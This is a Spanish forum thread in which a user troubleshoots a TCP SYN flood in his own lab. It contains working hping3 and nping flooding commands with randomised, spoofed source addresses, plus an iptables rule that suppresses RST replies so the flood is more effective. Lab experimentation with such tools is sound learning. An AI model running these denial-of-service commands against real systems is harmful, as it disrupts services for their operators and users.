elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Cifrar documentos-carpetas con GnuPG en Linux y Windows


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  TCP SYN Flood con Nping
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: TCP SYN Flood con Nping  (Leído 2,456 veces)
pablox_co

Desconectado Desconectado

Mensajes: 26


Ver Perfil WWW
TCP SYN Flood con Nping
« en: 13 Agosto 2013, 10:27 »

Saludos:

No he podido realizar un ataque de este tipo en mi laboratorio de pruebas, con hping3 lo he logrado:

Código:
# hping3 --syn --flood --rand-source --destport 443 192.168.1.254

Pero con nping no lo he logrado:

Código:
# nping --tcp SYN --dest-port 443 --source-ip rand --rate 90000 --count 900000 192.168.1.254

Ahí estoy tratando de recrear lo mismo que hago con hping3:
  • Flag SYN activado
  • Puerto 443 del objetivo
  • Hago un spoof de la dirección IP
  • Y la opción flood de hping la simulo con --rate y --count

Lo único diferente que he encontrado en el comportamiento entre las dos herramientas usando wireshark, es que hping3 hace un spoof de la dirección IP por cada paqueda que envía, mientras nping genera una única dirección IP para todos los paquetes enviados.

Nota: No confundir con el ataque TCP Connection Flood.

¡Gracias!
En línea

pablox_co

Desconectado Desconectado

Mensajes: 26


Ver Perfil WWW
Re: TCP SYN Flood con Nping
« Respuesta #1 en: 15 Agosto 2013, 12:17 »

Bueno, ahora que ya pude evitar que Nping me enviara el segmento TCP RST[1] el cual era una de las razones por los que culpaba  el NO exito de ataque (el otro era la no generación de IP aleatorias por paquetes). Probaré de nuevo el ataque en mi laboratorio añadiendo la restricción en iptables para que no salga el segmento TCP RST al objetivo:

Código:
# iptables -I OUTPUT --destination 192.168.1.254 --protocol tcp --dport 443 --tcp-flags RST RST -j DROP

Pero eso ya será el día de mañana, por ahora, es tiempo de dormir  ::).

[1] https://foro.elhacker.net/redes/nping_evitar_segmento_tcp_rst-t396059.0.html
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Syn Flood
Programación General
Yami_DRK3 0 970 Último mensaje 29 Febrero 2004, 19:17
por Yami_DRK3
flood msn y nicks
Análisis y Diseño de Malware
Kasty 0 720 Último mensaje 5 Mayo 2004, 06:26
por Kasty
Flood
Dudas Generales
+ enrique ZP 6 1,526 Último mensaje 6 Julio 2006, 11:46
por + enrique ZP
Flood msn
Chats; IRC y Messengers
Sandman_m4a1 4 1,632 Último mensaje 1 Noviembre 2006, 21:47
por skapunky
Nping - Evitar segmento TCP RST
Redes
pablox_co 5 1,966 Último mensaje 15 Agosto 2013, 12:07
por pablox_co
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines